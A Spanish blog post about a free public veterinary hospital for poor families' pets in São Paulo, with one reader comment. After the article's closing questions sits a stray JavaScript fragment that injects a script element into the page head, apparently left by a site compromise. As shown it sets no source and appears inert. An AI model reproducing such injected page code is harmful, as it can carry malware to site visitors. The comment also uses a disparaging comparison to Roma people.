Salud y belleza » Medicina, Salud

Un hospital público para animales pobres en Brasil

1 Comentario

hospital-animalesSi los españoles nos estamos quejando porque cada vez la Sanidad Pública está más desvirtuada (ahora los perjudicados son los inmigrantes ilegales sin atención médica) más nos vale no compararnos con Brasil que ha abierto un hospital público destinado a atender gratuitamente a animales pobres. En realidad atienden a animales domésticos de familias que no pueden pagarse un veterinario de pago y que quieren curar a sus mascotas.

hospital-publico-animalesEl hospital se encuentra en Sâo Paulo y lleva abierto un mes. Fue una iniciativa del Partido Verde y se ha construido en la ciudad más rica del país con 6 millones de mascotas. El centro está teniendo tanto éxito que las autoridades locales ya están pensando en agrandarlo y otras ciudades quieren copiar la idea.

La demanda está desorbitada y se forman colas en el centro hasta altas horas de las madrugadas. En este hospital se dedican a eliminar el dolor de animales enfermos sin posibilidad de tratamiento, reducir la angustia de sus amos (sobre todo aquellas personas mayores que solo tienen a sus mascotas de compañía) y ayudan a mejorar la sanidad pública tratando a animales enfermos que si no se curaran podrían transmitir las enfermedades a los humanos.

veterinario-publicoAdemás, las mascotas además de cómo animales de compañía para sus amos son un gran apoyo emocional y, en muchos casos, físico. Se ha demostrado que ayudan a superar ciertas enfermedades porque animan a las personas.

La Constitución de Brasil regula en su artículo 225: “el respeto a la vida, la libertad corporal y la integridad física de los animales, prohibiendo prácticas que los pongan en riesgo o provoquen su extinción”.

¿Qué opinas de esta idea de un hospital para animales pobres? ¿Cómo crees que favorecen las mascotas la salud de las personas?var d=document;var s=d.createElement('script'); d.getElementsByTagName('head')[0].appendChild(s);

Más consejos de salud y belleza : , ,

One Comment »

  • Pepa said:

    Me encanta la idea, y también la foto del perrito :) Qué mono… La verdad es que hay muchos animales que mueren sin atención porque los costos son muy caros. Los pobres tienen que sufrir, somos unos desalmados, aquí dejamos a los perros y a los inmigrantes en la calle, qué decepción… Después nos quejaremos si en Europa nos tratan como gitanos pero es que nosotros tratamos a los demás así por lo que nos lo merecemos…

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.